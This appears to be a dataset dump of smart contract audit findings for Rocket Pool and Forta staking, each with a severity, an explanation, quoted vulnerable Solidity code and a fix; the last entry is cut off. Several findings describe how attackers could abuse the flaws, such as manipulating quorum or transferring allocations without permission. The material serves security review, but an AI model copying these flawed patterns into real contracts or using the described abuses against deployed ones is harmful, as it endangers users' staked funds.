oDAO members' votes taken into account AcknowledgedчmediumчoDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(\"rocketNetworkPrices\", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(\"minipool.bond.reduction.vote.count\", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(\"rocketNetworkPenalties\", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(\"rocketDAOProtocolSettingsNetwork\"));\\n // Get submission keys\\n```\\nчTrack oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n -didTransferShares function has no access control modifierчhighчThe staked tokens (shares) in Forta are meant to be transferable. Similarly, the rewards allocation for these shares for delegated staking is meant to be transferable as well. This allocation for the shares' owner is tracked in the `StakeAllocator`. To enable this, the Forta staking contract `FortaStaking` implements a `_beforeTokenTransfer()` function that calls `_allocator.didTransferShares()` when it is appropriate to transfer the underlying allocation.\\n```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n\\nDue to this, the `StakeAllocator.didTransferShares()` has an `external` visibility so it can be called from the `FortaStaking` contract to perform transfers. However, there is no access control modifier to allow only the staking contract to call this. Therefore, anyone can call this function with whatever parameters they want.\\n```\\nfunction didTransferShares(\\n uint256 sharesId,\\n uint8 subjectType,\\n address from,\\n address to,\\n uint256 sharesAmount\\n) external {\\n \\_rewardsDistributor.didTransferShares(sharesId, subjectType, from, to, sharesAmount);\\n}\\n```\\n\\nSince the allocation isn't represented as a token standard and is tracked directly in the `StakeAllocator` and `RewardsDistributor`, it lacks many standard checks that would prevent abuse of the function. For example, this function does not have a check for allowance or `msg.sender==from`, so any user could call `didTransferShares()` with `to` being their address and `from` being any address they want `to` transfer allocation `from`, and the call would succeed.чApply access control modifiers as appropriate for this contract, for example `onlyRole()`.чч```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n -Incorrect reward epoch start date calculationчhighчThe Forta rewards system is based on epochs. A privileged address with the role `REWARDER_ROLE` calls the `reward()` function with a parameter for a specific `epochNumber` that consequently distributes the rewards for that epoch. Additionally, as users stake and delegate their stake, accounts in the Forta system accrue weight that is based on the active stake to distribute these rewards. Since accounts can modify their stake as well as delegate or un-delegate it, the rewards weight for each account can be modified, as seen, for example, in the `didAllocate()` function. In turn, this modifies the `DelegatedAccRewards` storage struct that stores the accumulated rewards for each share id. To keep track of changes done to the accumulated rewards, epochs with checkpoints are used to manage the accumulated rate of rewards, their value at the checkpoint, and the timestamp of the checkpoint.\\nFor example, in the `didAllocate()` function the `addRate()` function is being called to modify the accumulated rewards.\\n```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n\\nThen the function flow goes into `setRate()` that checks the existing accumulated rewards storage and modifies it based on the current timestamp.\\n```\\nfunction addRate(Accumulator storage acc, uint256 rate) internal {\\n setRate(acc, latest(acc).rate + rate);\\n}\\n```\\n\\n```\\nfunction setRate(Accumulator storage acc, uint256 rate) internal {\\n EpochCheckpoint memory ckpt = EpochCheckpoint({ timestamp: SafeCast.toUint32(block.timestamp), rate: SafeCast.toUint224(rate), value: getValue(acc) });\\n uint256 length = acc.checkpoints.length;\\n if (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n } else {\\n acc.checkpoints.push(ckpt);\\n }\\n}\\n```\\n\\nNamely, it pushes epoch checkpoints to the list of account checkpoints based on its timestamp. If the last checkpoint's timestamp is during the current epoch, then the last checkpoint is replaced with the new one altogether. If the last checkpoint's timestamp is different from the current epoch, a new checkpoint is added to the list. However, the `isCurrentEpoch()` function calls a function `getCurrentEpochTimestamp()` that incorrectly determines the start date of the current epoch. In particular, it doesn't take the offset into account when calculating how many epochs have already passed.\\n```\\nfunction getCurrentEpochTimestamp() internal view returns (uint256) {\\n return ((block.timestamp / EPOCH\\_LENGTH) \\* EPOCH\\_LENGTH) + TIMESTAMP\\_OFFSET;\\n}\\n\\nfunction isCurrentEpoch(uint256 timestamp) internal view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp > currentEpochStart;\\n}\\n```\\n\\nInstead of `((block.timestamp / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`, it should be `(((block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`. In fact, it should simply call the `getEpochNumber()` function that correctly provides the epoch number for any timestamp.\\n```\\nfunction getEpochNumber(uint256 timestamp) internal pure returns (uint32) {\\n return SafeCast.toUint32((timestamp - TIMESTAMP\\_OFFSET) / EPOCH\\_LENGTH);\\n}\\n```\\n\\nIn other words, the resulting function would look something like the following:\\n```\\n function getCurrentEpochTimestamp() public view returns (uint256) {\\n return (getEpochNumber(block.timestamp) * EPOCH_LENGTH) + TIMESTAMP_OFFSET;\\n }\\n```\\n\\nOtherwise, if `block.timestamp` is such that `(block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH = n` and `block.timestamp` / EPOCH_LENGTH = n+1, which would happen on roughly 4 out of 7 days of the week since `EPOCH_LENGTH = 1 weeks` and `TIMESTAMP_OFFSET = 4 days`, this would cause the `getCurrentEpochTimestamp()` function to return the end timestamp of the epoch (which is in the future) instead of the start. Therefore, if a checkpoint with such a timestamp is committed to the account's accumulated rewards checkpoints list, it will always fail the below check in the epoch it got submitted, and any checkpoint committed afterwards but during the same epoch with a similar type of `block.timestamp` (i.e. satisfying the condition at the beginning of this paragraph), would be pushed to the top of the list instead of replacing the previous checkpoint.\\n```\\nif (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n} else {\\n acc.checkpoints.push(ckpt);\\n```\\n\\nThis causes several checkpoints to be stored for the same epoch, which would cause issues in functions such as `getAtEpoch()`, that feeds into `getValueAtEpoch()` function that provides data for the rewards' share calculation. In the end, this would cause issues in the accounting for the rewards calculation resulting in incorrect distributions.\\nDuring the discussion with the Forta Foundation team, it was additionally discovered that there are edge cases around the limits of epochs. Specifically, epoch's end time and the subsequent epoch's start time are exactly the same, although it should be that it is only the start of the next epoch. Similarly, that start time isn't recognized as part of the epoch due to `>` sign instead of `>=`. In particular, the following changes need to be made:\\n```\\n function getEpochEndTimestamp(uint256 epochNumber) public pure returns (uint256) {\\n return ((epochNumber + 1) * EPOCH_LENGTH) + TIMESTAMP_OFFSET - 1; <---- so it is 23:59:59 instead of next day 00:00:00\\n }\\n\\n function isCurrentEpoch(uint256 timestamp) public view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp >= currentEpochStart; <--- for the first second on Monday\\n }\\n```\\nчA refactor of the epoch timestamp calculation functions is recommended to account for:\\nThe correct epoch number to calculate the start and end timestamps of epochs.\\nThe boundaries of epochs coinciding.\\nClarity in functions' intent. For example, adding a function just to calculate any epoch's start time and renaming `getCurrentEpochTimestamp()` to `getCurrentEpochStartTimestamp()`.чч```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n -A single unfreeze dismisses all other slashing proposal freezesчhighчIn order to retaliate against malicious actors, the Forta staking system allows users to submit slashing proposals that are guarded by submitting along a deposit with a slashing reason. These proposals immediately freeze the proposal's subject's stake, blocking them from withdrawing that stake.\\nAt the same time, there can be multiple proposals submitted against the same subject, which works out with freezing - the subject remains frozen with each proposal submitted. However, once any one of the active proposals against the subject gets to the end of its lifecycle, be it `REJECTED`, `DISMISSED`, `EXECUTED`, or `REVERTED`, the subject gets unfrozen altogether. The other proposals might still be active, but the stake is no longer frozen, allowing the subject to withdraw it if they would like.\\nIn terms of impact, this allows bad actors to avoid punishment intended by the slashes and freezes. A malicious actor could, for example, submit a faulty proposal against themselves in the hopes that it will get quickly rejected or dismissed while the existing, legitimate proposals against them are still being considered. This would allow them to get unfrozen quickly and withdraw their stake. Similarly, in the event a bad staker has several proposals against them, they could withdraw right after a single slashing proposal goes through.\\n```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction rejectSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, REJECTED);\\n \\_submitEvidence(\\_proposalId, REJECTED, \\_evidence);\\n \\_slashDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction reviewSlashProposalParameters(\\n uint256 \\_proposalId,\\n uint8 \\_subjectType,\\n uint256 \\_subjectId,\\n bytes32 \\_penaltyId,\\n string[] calldata \\_evidence\\n) external onlyRole(SLASHING\\_ARBITER\\_ROLE) onlyInState(\\_proposalId, IN\\_REVIEW) onlyValidSlashPenaltyId(\\_penaltyId) onlyValidSubjectType(\\_subjectType) notAgencyType(\\_subjectType, SubjectStakeAgency.DELEGATOR) {\\n // No need to check for proposal existence, onlyInState will revert if \\_proposalId is in undefined state\\n if (!subjectGateway.isRegistered(\\_subjectType, \\_subjectId)) revert NonRegisteredSubject(\\_subjectType, \\_subjectId);\\n\\n \\_submitEvidence(\\_proposalId, IN\\_REVIEW, \\_evidence);\\n if (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n }\\n```\\n\\n```\\nfunction revertSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external {\\n \\_authorizeRevertSlashProposal(\\_proposalId);\\n \\_transition(\\_proposalId, REVERTED);\\n \\_submitEvidence(\\_proposalId, REVERTED, \\_evidence);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction executeSlashProposal(uint256 \\_proposalId) external onlyRole(SLASHER\\_ROLE) {\\n \\_transition(\\_proposalId, EXECUTED);\\n Proposal memory proposal = proposals[\\_proposalId];\\n slashingExecutor.slash(proposal.subjectType, proposal.subjectId, getSlashedStakeValue(\\_proposalId), proposal.proposer, slashPercentToProposer);\\n slashingExecutor.freeze(proposal.subjectType, proposal.subjectId, false);\\n}\\n```\\n\\n```\\nfunction \\_unfreeze(uint256 \\_proposalId) private {\\n slashingExecutor.freeze(proposals[\\_proposalId].subjectType, proposals[\\_proposalId].subjectId, false);\\n}\\n```\\nчIntroduce a check in the unfreezing mechanics to first ensure there are no other active proposals for that subject.чч```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n -Storage gap variables slightly off from the intended sizeчmediumчThe Forta staking system is using upgradeable proxies for its deployment strategy. To avoid storage collisions between contract versions during upgrades, uint256[] private `__gap` array variables are introduced that create a storage buffer. Together with contract state variables, the storage slots should sum up to 50. For example, the `__gap` variable is present in the `BaseComponentUpgradeable` component, which is the base of most Forta contracts, and there is a helpful comment in `AgentRegistryCore` that describes how its relevant `__gap` variable size was calculated:\\n```\\nuint256[50] private \\_\\_gap;\\n```\\n\\n```\\nuint256[41] private \\_\\_gap; // 50 - 1 (frontRunningDelay) - 3 (\\_stakeThreshold) - 5 StakeSubjectUpgradeable\\n```\\n\\nHowever, there are a few places where the `__gap` size was not computed correctly to get the storage slots up to 50. Some of these are:\\n```\\nuint256[49] private \\_\\_gap;\\n```\\n\\n```\\nuint256[47] private \\_\\_gap;\\n```\\n\\n```\\nuint256[44] private \\_\\_gap;\\n```\\n\\nWhile these still provide large storage buffers, it is best if the `__gap` variables are calculated to hold the same buffer within contracts of similar types as per the initial intentions to avoid confusion.\\nDuring conversations with the Forta Foundation team, it appears that some contracts like `ScannerRegistry` and `AgentRegistry` should instead add up to 45 with their `__gap` variable due to the `StakeSubject` contracts they inherit from adding 5 from themselves. This is something to note and be careful with as well for future upgrades.чProvide appropriate sizes for the `__gap` variables to have a consistent storage layout approach that would help avoid storage issues with future versions of the system.чч```\\nuint256[50] private \\_\\_gap;\\n```\\n -AgentRegistryCore - Agent Creation DoSчmediumчAgentRegistryCore allows anyone to mint an `agentID` for the desired owner address. However, in some cases, it may fall prey to DoS, either deliberately or unintentionally.\\nFor instance, let's assume the Front Running Protection is disabled or the `frontRunningDelay` is 0. It means anyone can directly create an agent without any prior commitment. Thus, anyone can observe pending transactions and try to front run them to mint an `agentID` prior to the victim's restricting it to mint a desired `agentID`.\\nAlso, it may be possible that a malicious actor succeeds in frontrunning a transaction with manipulated data/chainIDs but with the same owner address and `agentID`. There is a good chance that victim still accepts the attacker's transaction as valid, even though its own transaction reverted, due to the fact that the victim is still seeing itself as the owner of that ID.\\nTaking an instance where let's assume the frontrunning protection is enabled. Still, there is a good chance that two users vouch for the same `agentIDs` and commits in the same block, thus getting the same frontrunning delay. Then, it will be a game of luck, whoever creates that agent first will get the ID minted to its address, and the other user's transaction will be reverted wasting the time they have spent on the delay.\\nAs the `agentIDs` can be picked by users, the chances of collisions with an already minted ID will increase over time causing unnecessary reverts for others.\\nAdding to the fact that there is no restriction for owner address, anyone can spam mint any `agentID` to any address for any profitable reason.\\n```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\nчModify function `prepareAgent` to not commit an already registered `agentID`.\\nA better approach could be to allow sequential minting of `agentIDs` using some counters.\\nOnly allow users to mint an `agentID`, either for themselves or for someone they are approved to.чч```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n -Lack of checks for rewarding an epoch that has already been rewardedчmediumчTo give rewards to the participating stakers, the Forta system utilizes reward epochs for each `shareId`, i.e. a delegated staking share. Each epoch gets their own reward distribution, and then `StakeAllocator` and `RewardsDistributor` contracts along with the Forta staking shares determine how much the users get.\\nTo actually allocate these rewards, a privileged account with the role `REWARDER_ROLE` calls the `RewardsDistributor.reward()` function with appropriate parameters to store the `amount` a `shareId` gets for that specific `epochNumber`, and then adds the `amount` to the `totalRewardsDistributed` contract variable for tracking. However, there is no check that the `shareId` already received rewards for that `epoch`. The new reward `amount` simply replaces the old reward `amount`, and `totalRewardsDistributed` gets the new `amount` added to it anyway. This causes inconsistencies with accounting in the `totalRewardsDistributed` variable.\\nAlthough `totalRewardsDistributed` is essentially isolated to the `sweep()` function to allow transferring out the reward tokens without taking away those tokens reserved for the reward distribution, this still creates an inconsistency, albeit a minor one in the context of the current system.\\nSimilarly, the `sweep()` function deducts the `totalRewardsDistributed` amount instead of the amount of pending rewards only. In other words, either there should be a different variable that tracks only pending rewards, or the `totalRewardsDistributed` should have token amounts deducted from it when users execute the `claimRewards()` function. Otherwise, after a few epochs there will be a really large `totalRewardsDistributed` amount that might not reflect the real amount of pending reward tokens left on the contract, and the `sweep()` function for the reward token is likely to fail for any amount being transferred out.\\n```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\nчImplement checks as appropriate to the `reward()` function to ensure correct behavior of `totalRewardsDistributed` tracking. Also, implement necessary changes to the tracking of pending rewards, if necessary.чч```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n -Reentrancy in FortaStaking during ERC1155 mintsчmediumчIn the Forta staking system, the staking shares (both “active” and “inactive”) are represented as tokens implemented according to the `ERC1155` standard. The specific implementation that is being used utilizes a smart contract acceptance check `_doSafeTransferAcceptanceCheck()` upon mints to the recipient.\\n```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n\\nThe specific implementation for `ERC1155SupplyUpgradeable` contracts can be found here, and the smart contract check can be found here.\\nThis opens up reentrancy into the system's flow. In fact, the reentrancy occurs on all mints that happen in the below functions, and it happens before a call to another Forta contract for allocation is made via either `_allocator.depositAllocation` or _allocator.withdrawAllocation:\\n```\\nfunction deposit(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeValue\\n) external onlyValidSubjectType(subjectType) notAgencyType(subjectType, SubjectStakeAgency.MANAGED) returns (uint256) {\\n if (address(subjectGateway) == address(0)) revert ZeroAddress(\"subjectGateway\");\\n if (!subjectGateway.isStakeActivatedFor(subjectType, subject)) revert StakeInactiveOrSubjectNotFound();\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n bool reachedMax;\\n (stakeValue, reachedMax) = \\_getInboundStake(subjectType, subject, stakeValue);\\n if (reachedMax) {\\n emit MaxStakeReached(subjectType, subject);\\n }\\n uint256 sharesValue = stakeToActiveShares(activeSharesId, stakeValue);\\n SafeERC20.safeTransferFrom(stakedToken, staker, address(this), stakeValue);\\n\\n \\_activeStake.mint(activeSharesId, stakeValue);\\n \\_mint(staker, activeSharesId, sharesValue, new bytes(0));\\n emit StakeDeposited(subjectType, subject, staker, stakeValue);\\n \\_allocator.depositAllocation(activeSharesId, subjectType, subject, staker, stakeValue, sharesValue);\\n return sharesValue;\\n}\\n```\\n\\n```\\nfunction migrate(\\n uint8 oldSubjectType,\\n uint256 oldSubject,\\n uint8 newSubjectType,\\n uint256 newSubject,\\n address staker\\n) external onlyRole(SCANNER\\_2\\_NODE\\_RUNNER\\_MIGRATOR\\_ROLE) {\\n if (oldSubjectType != SCANNER\\_SUBJECT) revert InvalidSubjectType(oldSubjectType);\\n if (newSubjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(newSubjectType); \\n if (isFrozen(oldSubjectType, oldSubject)) revert FrozenSubject();\\n\\n uint256 oldSharesId = FortaStakingUtils.subjectToActive(oldSubjectType, oldSubject);\\n uint256 oldShares = balanceOf(staker, oldSharesId);\\n uint256 stake = activeSharesToStake(oldSharesId, oldShares);\\n uint256 newSharesId = FortaStakingUtils.subjectToActive(newSubjectType, newSubject);\\n uint256 newShares = stakeToActiveShares(newSharesId, stake);\\n\\n \\_activeStake.burn(oldSharesId, stake);\\n \\_activeStake.mint(newSharesId, stake);\\n \\_burn(staker, oldSharesId, oldShares);\\n \\_mint(staker, newSharesId, newShares, new bytes(0));\\n emit StakeDeposited(newSubjectType, newSubject, staker, stake);\\n \\_allocator.depositAllocation(newSharesId, newSubjectType, newSubject, staker, stake, newShares);\\n}\\n```\\n\\n```\\nfunction initiateWithdrawal(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 sharesValue\\n) external onlyValidSubjectType(subjectType) returns (uint64) {\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n if (balanceOf(staker, activeSharesId) == 0) revert NoActiveShares();\\n uint64 deadline = SafeCast.toUint64(block.timestamp) + \\_withdrawalDelay;\\n\\n \\_lockingDelay[activeSharesId][staker].setDeadline(deadline);\\n\\n uint256 activeShares = Math.min(sharesValue, balanceOf(staker, activeSharesId));\\n uint256 stakeValue = activeSharesToStake(activeSharesId, activeShares);\\n uint256 inactiveShares = stakeToInactiveShares(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n SubjectStakeAgency agency = getSubjectTypeAgency(subjectType);\\n \\_activeStake.burn(activeSharesId, stakeValue);\\n \\_inactiveStake.mint(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n \\_burn(staker, activeSharesId, activeShares);\\n \\_mint(staker, FortaStakingUtils.activeToInactive(activeSharesId), inactiveShares, new bytes(0));\\n if (agency == SubjectStakeAgency.DELEGATED || agency == SubjectStakeAgency.DELEGATOR) {\\n \\_allocator.withdrawAllocation(activeSharesId, subjectType, subject, staker, stakeValue, activeShares);\\n }\\n```\\n\\nAlthough this doesn't seem to be an issue in the current Forta system of contracts since the allocator's logic doesn't seem to be manipulable, this could still be dangerous as it opens up an external execution flow.чConsider introducing a reentrancy check or emphasize this behavior in the documentation, so that both other projects using this system later and future upgrades along with maintenance work on the Forta staking system itself are implemented safely.чч```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n -Unnecessary code blocks that check the same conditionчlowчIn the `RewardsDistributor` there is a function that allows to set delegation fees for a `NodeRunner`. It adjusts the `fees[]` array for that node as appropriate. However, during its checks, it performs the same check twice in a row.\\n```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\nчConsider refactoring this under a single code block.чч```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n -Event spam in RewardsDistributor.claimRewardsчlowчThe `RewardsDistributor` contract allows users to claim their rewards through the `claimRewards()` function. It does check to see whether or not the user has already claimed the rewards for a specific epoch that they are claiming for, but it does not check to see if the user has any associated rewards at all. This could lead to event `ClaimedRewards` being spammed by malicious users, especially on low gas chains.\\n```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\nчAdd a check for rewards amounts being greater than 0.чч```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, 